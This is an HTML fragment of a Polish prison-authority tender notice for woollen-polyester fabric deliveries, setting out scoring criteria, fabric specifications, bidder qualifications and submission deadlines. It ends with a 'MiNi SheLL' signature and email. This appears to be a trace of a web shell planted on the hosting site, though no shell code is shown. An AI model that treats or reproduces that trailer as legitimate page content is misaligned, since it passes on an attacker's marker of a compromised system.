Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty dla I, II i III części zamówienia, zamawiający będzie kierował się następującymi<br/>kryteriami i odpowiadającymi im znaczeniami oraz w następujący sposób będzie oceniał spełnienie kryteriów:<br/>Lp. Kryterium Ranga [%]<br/>1 Cena (C) 60<br/>2 Termin realizacji zamówienia (Tr) 40<br/>Oferty będą oceniane przez komisję przetargową metodą punktową w skali 100-punktowej.<br/>Nazwa kryterium - „Cena” (C)<br/>Waga kryterium – 60 %<br/>Wzór : (cena brutto najtańszej oferty/cena brutto ocenianej oferty) x 60<br/>Sposób punktowania – przyjmuje się, że 1% = 1 pkt . W kryterium „Cena” można uzyskać maksymalnie 60,00 pkt. Oferta<br/>wypełniająca w najwyższym stopniu wymagania otrzyma maksymalną liczbę punktów. Pozostałym ofertom, wypełniającym<br/>wymagania kryterialne przypisana zostanie odpowiednio mniejsza (proporcjonalnie mniejsza) liczba punktów. Wynik będzie<br/>traktowany jako wartość punktowa oferty.<br/>Nazwa kryterium - „Termin realizacji zamówienia” (Tr)<br/>Waga kryterium – 40 %<br/>Sposób punktowania - przyjmuje się, że 1% = 1 pkt . W kryterium „ Termin realizacji zamówienia ” można uzyskać<br/>maksymalnie 40,00 pkt. Zamawiający przyzna wykonawcy 20 pkt. za każde skrócenie terminu realizacji zamówienia<br/>o 1 miesiąc w stosunku do wymaganego terminu realizacji zamówienia określonego przez zamawiającego w SWZ,<br/>czyli 3 miesięcy od dnia podpisania umowy.<br/>Zgodnie z powyższym oferta z terminem realizacji zamówienia :<br/>– 3 miesiące od dnia podpisania umowy otrzyma 0 pkt.<br/>– 2 miesiące od dnia podpisania umowy otrzyma 20 pkt.<br/>– 1 miesiąc od dnia podpisania umowy 40 pkt.<br/>W przypadku gdy wykonawca zaoferuje inny termin realizacji zamówienia niż jeden z terminów wskazanych powyżej,<br/>oferta wykonawcy podlegać będzie odrzuceniu na podstawie art. 226 ust.1 pkt 5 Pzp.<br/>Oferta, która przedstawia najkorzystniejszy bilans (maksymalna liczba przyznanych punktów w oparciu o ustalone kryteria)<br/>zostanie uznana za najkorzystniejszą, pozostałe oferty zostaną sklasyfikowane zgodnie z ilością uzyskanych punktów.<br/>Zamówienie zostanie udzielone wykonawcy, który uzyska najwyższą ilość punktów. Jeżeli nie będzie można dokonać<br/>wyboru oferty najkorzystniejszej ze względu na to, że dwie lub więcej ofert otrzyma taką samą punktację, zamawiający<br/>spośród tych ofert wybierze ofertę z najniższą ceną, a jeżeli zostały złożone oferty o takiej samej cenie, zamawiający wezwie<br/>wykonawców, którzy złożyli te oferty, do złożenia w terminie przez siebie określonym ofert dodatkowych. O wyborze<br/>wykonawcy, zamawiający niezwłocznie zawiadomi uczestników postępowania, którzy ubiegali się o udzielenie zamówienia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Opis Przedmiotu Zamówienia część III– Tropik – 747 mb.<br/>1. Charakterystyka wyrobu.<br/>1.1. Skład surowcowy tkaniny.<br/>• Wełna – 45%, Poliester – 55%.<br/>1.2. Splot.<br/>• Płócienny 1/1.<br/>1.3. Masa tkaniny.<br/>• Liniowa – 343 g/m ± 10 g/m;<br/>• Powierzchniowa – 240 g/m2 ± 10 g/m2.<br/>1.4. Szerokość tkaniny.<br/>• 144 cm ± 2 cm.<br/>3<br/>DKw.2232.21.2022.KB Załącznik nr 6<br/>1.5. Liczba nitek w tkaninie na 1 dm.<br/>• Osnowa – 185 ± 10;<br/>• Wątek – 160 ± 10.<br/>1.6. Kolor.<br/>• Ciemno – szary (stalowy).<br/>• Współrzędne barwy: L = 24,90; a = 0,15; b = - 6,86; Δ E ≤ 1,5.<br/>1.7. Parametry przędzy (masa liniowa [tex] i skręt).<br/>• Osnowa – 21 Z 550 x 3 S 560;<br/>• Wątek – 21 Z 550 x 3 S 560.<br/>2. Znakowanie.<br/>Oznakowanie w formie etykiety umieszczonej przy rolce powinno zawierać przynajmniej :<br/>• Dane producenta;<br/>• Skład surowcowy tkaniny;<br/>• Szerokość tkaniny;<br/>• Długość nawiniętej tkaniny;<br/>• Masę nawiniętej tkaniny;<br/>• Oznaczenie jakości tkaniny.<br/>3. Pakowanie, przechowywanie, transport.<br/>3.1. Pakowanie.<br/>Tkanina powinna być nawinięta na tekturową tuleję, długość nawiniętego materiału nie powinna<br/>przekraczać 70 mb. Każda rolka zapakowana w folię.<br/>3.2. Przechowywanie.<br/>Tkaninę należy przechowywać w pomieszczeniach przewiewnych, suchych, pozbawionych obcych<br/>zapachów. Wyrób powinien być zabezpieczony przed zniszczeniem przez pleśń, bakterie i inne<br/>czynniki zewnętrzne, zawilgoceniem, poplamieniem, zabrudzeniem, a także przed bezpośrednim<br/>działaniem promieni słonecznych.<br/>3.3. Transport.<br/>Załadowanie, przewóz (w zamkniętych środkach transportu) i wyładowanie powinny odbywać się<br/>w warunkach zabezpieczającymi tkaninę przed zabrudzeniem, zamoczeniem, uszkodzeniami<br/>mechanicznymi i chemicznymi zgodnie z obowiązującymi przepisami transportowymi. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">19200000-8 - Tkaniny włókiennicze i podobne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">3 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty dla I, II i III części zamówienia, zamawiający będzie kierował się następującymi<br/>kryteriami i odpowiadającymi im znaczeniami oraz w następujący sposób będzie oceniał spełnienie kryteriów:<br/>Lp. Kryterium Ranga [%]<br/>1 Cena (C) 60<br/>2 Termin realizacji zamówienia (Tr) 40<br/>Oferty będą oceniane przez komisję przetargową metodą punktową w skali 100-punktowej.<br/>Nazwa kryterium - „Cena” (C)<br/>Waga kryterium – 60 %<br/>Wzór : (cena brutto najtańszej oferty/cena brutto ocenianej oferty) x 60<br/>Sposób punktowania – przyjmuje się, że 1% = 1 pkt . W kryterium „Cena” można uzyskać maksymalnie 60,00 pkt. Oferta<br/>wypełniająca w najwyższym stopniu wymagania otrzyma maksymalną liczbę punktów. Pozostałym ofertom, wypełniającym<br/>wymagania kryterialne przypisana zostanie odpowiednio mniejsza (proporcjonalnie mniejsza) liczba punktów. Wynik będzie<br/>traktowany jako wartość punktowa oferty.<br/>Nazwa kryterium - „Termin realizacji zamówienia” (Tr)<br/>Waga kryterium – 40 %<br/>Sposób punktowania - przyjmuje się, że 1% = 1 pkt . W kryterium „ Termin realizacji zamówienia ” można uzyskać<br/>maksymalnie 40,00 pkt. Zamawiający przyzna wykonawcy 20 pkt. za każde skrócenie terminu realizacji zamówienia<br/>o 1 miesiąc w stosunku do wymaganego terminu realizacji zamówienia określonego przez zamawiającego w SWZ,<br/>czyli 3 miesięcy od dnia podpisania umowy.<br/>Zgodnie z powyższym oferta z terminem realizacji zamówienia :<br/>– 3 miesiące od dnia podpisania umowy otrzyma 0 pkt.<br/>– 2 miesiące od dnia podpisania umowy otrzyma 20 pkt.<br/>– 1 miesiąc od dnia podpisania umowy 40 pkt.<br/>W przypadku gdy wykonawca zaoferuje inny termin realizacji zamówienia niż jeden z terminów wskazanych powyżej,<br/>oferta wykonawcy podlegać będzie odrzuceniu na podstawie art. 226 ust.1 pkt 5 Pzp.<br/>Oferta, która przedstawia najkorzystniejszy bilans (maksymalna liczba przyznanych punktów w oparciu o ustalone kryteria)<br/>zostanie uznana za najkorzystniejszą, pozostałe oferty zostaną sklasyfikowane zgodnie z ilością uzyskanych punktów.<br/>Zamówienie zostanie udzielone wykonawcy, który uzyska najwyższą ilość punktów. Jeżeli nie będzie można dokonać<br/>wyboru oferty najkorzystniejszej ze względu na to, że dwie lub więcej ofert otrzyma taką samą punktację, zamawiający<br/>spośród tych ofert wybierze ofertę z najniższą ceną, a jeżeli zostały złożone oferty o takiej samej cenie, zamawiający wezwie<br/>wykonawców, którzy złożyli te oferty, do złożenia w terminie przez siebie określonym ofert dodatkowych. O wyborze<br/>wykonawcy, zamawiający niezwłocznie zawiadomi uczestników postępowania, którzy ubiegali się o udzielenie zamówienia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Na podstawie art. 112 ustawy Pzp, zamawiający określa warunki udziału w postępowaniu dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym - zamawiający odstępuje od wymagania podmiotowych środków<br/>dowodowych w tym zakresie.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to<br/>z odrębnych przepisów - zamawiający odstępuje od wymagania podmiotowych środków dowodowych w tym zakresie.<br/>3) sytuacji ekonomicznej lub finansowej - zamawiający odstępuje od wymagania podmiotowych środków dowodowych w<br/>tym zakresie.<br/>4) zdolności technicznej lub zawodowej :<br/>Zamawiający uzna, że wykonawca spełnia warunek w zakresie posiadania odpowiedniej zdolności technicznej lub<br/>zawodowej niezbędnej do realizacji zamówienia jeżeli wykaże, że w okresie trzech lat przed dniem wszczęcia<br/>postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje dostawy tkanin<br/>o których mowa w SWZ, o wartości:<br/>Dla części I zamówienia ( gabardyna ) : których sumaryczna wartość przekracza kwotę 50.000,00 zł brutto.<br/>Dla części II zamówienia ( gabardyna letnia ): których sumaryczna wartość przekracza kwotę 100.000,00 zł brutto.<br/>Dla części III zamówienia ( tropik ): których sumaryczna wartość przekracza kwotę 50.000,00 zł brutto.<br/>Do wykazu wykonawca załączy dowody - referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego<br/>dostawy były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej<br/>przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy.<br/>W przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich<br/>należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo<br/>wniosków o dopuszczenie do udziału w postępowaniu. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zgodnie z art. 274 ust. 1<br/>ustawy Pzp, zamawiający przed wyborem najkorzystniejszej oferty wezwie wykonawcę, którego oferta została najwyżej oceniona,<br/>do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia, następujących podmiotowych środków<br/>dowodowych:<br/>odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji<br/>i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed<br/>jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych, które<br/>zamawiający posiada, jeżeli wykonawca wskaże te środki oraz potwierdzi ich prawidłowość i<br/>aktualność.<br/>Wykonawca składa podmiotowe środki dowodowe aktualne na dzień ich złożenia.<br/>Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania<br/>ma osoba, której dokument dotyczy, nie wydaje się dokumentów, o których mowa powyżej, zastępuje<br/>się je dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo<br/>osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć,<br/>złożone przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania<br/>wykonawcy lub miejsce zamieszkania tej osoby. W przypadku wątpliwości co do treści dokumentu<br/>złożonego przez wykonawcę, zamawiający może zwrócić się do właściwych organów odpowiednio<br/>kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma<br/>osoba, której dokument dotyczy, o udzielenie niezbędnych informacji dotyczących tego dokumentu.<br/>Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych, jeżeli może je uzyskać za<br/>pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w<br/>rozumieniu ustawy z 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania<br/>publiczne, o ile wykonawca wskazał w oświadczeniu wstępnym dane umożliwiające dostęp do tych<br/>środków.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.<br/>Zgodnie z art. 274 ust. 1 ustawy Pzp, zamawiający przed wyborem najkorzystniejszej oferty wezwie wykonawcę, którego oferta<br/>została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia,<br/>następujących podmiotowych środków dowodowych:<br/>wykazu dostaw tkanin, o których mowa w SWZ, wykonanych w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest<br/>krótszy - w tym okresie :<br/>Dla części I zamówienia ( gabardyna ) : których sumaryczna wartość przekracza kwotę 50.000,00 zł brutto.<br/>Dla części II zamówienia ( gabardyna letnia ): których sumaryczna wartość przekracza kwotę 100.000,00 zł brutto.<br/>Dla części III zamówienia ( tropik ): których sumaryczna wartość przekracza kwotę 50.000,00 zł brutto.<br/>Do wykazu wykonawca załączy dowody - referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego dostawy<br/>były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli<br/>z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów – oświadczenie<br/>wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające<br/>ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o<br/>dopuszczenie do udziału w postępowaniu.<br/>Wymagana forma:<br/>Podmiotowe środki dowodowe przekazuje się w postaci elektronicznej i opatruje się kwalifikowanym podpisem elektronicznym,<br/>podpisem zaufanym lub podpisem osobistym.<br/>Gdy podmiotowe środki dowodowe zostały wystawione przez upoważnione podmioty inne niż wykonawca, wykonawca wspólnie<br/>ubiegający się o udzielenie zamówienia, podmiot udostępniający zasoby lub podwykonawca:<br/>a) jako dokument elektroniczny – przekazuje się ten dokument;<br/>b) jako dokument w postaci papierowej i opatrzone własnoręcznym podpisem – przekazuje się cyfrowe odwzorowanie tego<br/>dokumentu opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, poświadczające<br/>zgodność cyfrowego odwzorowania z dokumentem w postaci papierowej. Przez cyfrowe odwzorowanie, należy rozumieć dokument<br/>elektroniczny będący kopią elektroniczną treści zapisanej w postaci papierowej, umożliwiający zapoznanie się z tą treścią i jej<br/>zrozumienie, bez konieczności bezpośredniego dostępu do oryginału. Poświadczenia zgodności cyfrowego odwzorowania z<br/>dokumentem w postaci papierowej, dokonuje odpowiednio wykonawca, wykonawca wspólnie ubiegający się o udzielenie<br/>zamówienia, podmiot udostępniający zasoby lub podwykonawca, w zakresie podmiotowych środków dowodowych lub notariusz.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Przedmiotowe środki dowodowe to środki służące potwierdzeniu zgodności oferowanych dostaw<br/>z wymaganiami, cechami lub kryteriami określonymi w opisie przedmiotu zamówienia lub opisie<br/>kryteriów oceny ofert, lub wymaganiami związanymi z realizacją zamówienia.<br/>Zamawiający żąda, by wykonawca złożył wraz z ofertą następujące przedmiotowe środki<br/>dowodowe:<br/>a) dokumentację techniczno – technologiczną/ kartę charakterystyki wyrobu / certyfikat lub inny<br/>dokument dla części zamówienia na którą wykonawca złożył ofertę, zawierające<br/>wskaźniki/parametry potwierdzające spełnianie wymagań zawartych w opisie danej tkaniny.<br/>- do upływu terminu składania ofert :<br/>b) próbkę asortymentu stanowiącego przedmiot zamówienia w 1 stopniu jakości, o wym. 10 cm<br/>x10 cm na kontrastowym tle, opisane odpowiednio do złożonej oferty.<br/>Zamawiający akceptuje równoważne przedmiotowe środki dowodowe, jeśli potwierdzają, że<br/>oferowane dostawy spełniają określone przez zamawiającego wymagania, cechy lub kryteria. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> nie zostały one w ogóle złożone lub są niekompletne,<br/>oferta nie podlega odrzuceniu<br/>nie zachodzą przesłanki unieważnienia postępowania<br/>Jeżeli wykonawca złoży przedmiotowe środki dowodowe, które nie będą potwierdzały zgodności<br/>oferowanego przedmiotu zamówienia z wymaganiami zamawiającego, oferta podlegać będzie<br/>odrzuceniu bez wezwania do uzupełnienia <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>W takim przypadku:<br/>Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu<br/>albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie<br/>przedmiotowego zamówienia publicznego.Wszelka korespondencja będzie prowadzona przez zamawiającego wyłącznie z<br/>pełnomocnikiem.<br/>W przypadku oferty wspólnej musi być ona podpisana przez wszystkich wykonawców lub przez pełnomocnika.<br/>W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie, o którym mowa w art. 125 ust.1<br/>ustawy (załącznik nr 1, 2 do SWZ) składa każdy z wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te<br/>potwierdzają spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia w zakresie, w którym każdy z<br/>wykonawców wykazuje spełnianie warunków udziału w postępowaniu oraz brak podstaw<br/>wykluczenia (każdy z wykonawców wspólnie składających ofertę nie może podlegać wykluczeniu z postępowania co<br/>oznacza, iż oświadczenie w tym zakresie musi złożyć każdy z wykonawców składających ofertę wspólną; oświadczenie o<br/>spełnieniu warunków udziału składa podmiot, który w odniesieniu do danego warunku udziału w postępowaniu powierza<br/>jego spełnianie).Jeżeli została wybrana oferta wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia,zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii<br/>umowy regulującej współpracę tych wykonawców.<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ponoszą odpowiedzialność solidarną za wykonanie umowy.<br/>Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia.<br/>W przypadku złożenia oferty wspólnej:<br/>a) oferta winna być podpisana przez każdego partnera lub upoważnionego<br/>przedstawiciela/partnera wiodącego. Upoważnienie do pełnienia funkcji przedstawiciela /<br/>partnera wiodącego wymaga podpisu prawnie upoważnionych przedstawicieli każdego z<br/>partnerów – należy załączyć je do oferty,<br/>b) przedstawiciel / partner wiodący winien być upoważniony do zaciągania zobowiązań i płatności w imieniu i na rzecz<br/>każdego z partnerów oraz do wyłącznego występowania w realizacji kontraktu – do oferty należy załączyć oświadczenie <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Projektowane postanowienia umowy zawarte są w załączniku nr 9 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-09-06 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę wraz z załącznikami za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku” dostępnego na ePUAP.Areszt Śledczy w Łodzi</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-09-06 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-10-05</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com